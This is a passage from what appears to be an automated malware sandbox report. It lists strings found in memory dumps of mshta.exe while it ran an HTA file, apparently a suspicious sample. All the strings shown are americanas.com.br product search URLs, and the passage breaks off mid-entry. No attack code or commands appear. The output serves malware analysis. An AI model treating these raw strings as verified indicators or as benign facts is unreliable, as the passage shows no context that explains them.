Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511077657.000000000BE92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541754594.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12549952415.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509074640.000000000BE8F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/chocotone
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559750595.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574494320.000000000961C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/fantasia-papai-noel
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12399441552.00000000069FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510371736.000000000AB3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396485604.00000000069FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551073460.000000000AB59000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/galaxy-a14?c_bot=Customer-Categorized
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559750595.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509710023.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574494320.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/gorro-papai-noel
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577325605.000000000A988000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511657871.000000000A987000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574416086.000000000960B000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/guarda-roupa-bergamo
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509710023.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574416086.000000000960B000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/guirlanda-de-natal
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A9A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559750595.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/panetone
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506644684.000000000BE61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502799829.000000000BE56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579043048.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/panetone-bauducco
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541754594.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12549952415.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509850041.0000000009698000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510847946.00000000096C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/panetonem
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541754594.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12549952415.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/pisca-pisca
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541754594.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508140072.000000000ABBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12549952415.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542146842.000000000BE13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/piscinas
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506644684.000000000BE61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502799829.000000000BE56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579043048.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/presepio-de-natal
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541515073.000000000953E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506644684.000000000BE61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502799829.000000000BE56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573572782.00000000095A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579043048.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/whisky-royal-salute
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/busca/xbox-series-s
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574962923.000000000967A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/xbox-series-srBh8
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574609531.000000000962B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca?conteudo=
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12552919479.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577325605.000000000A988000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550560614.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511657871.000000000A987000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, 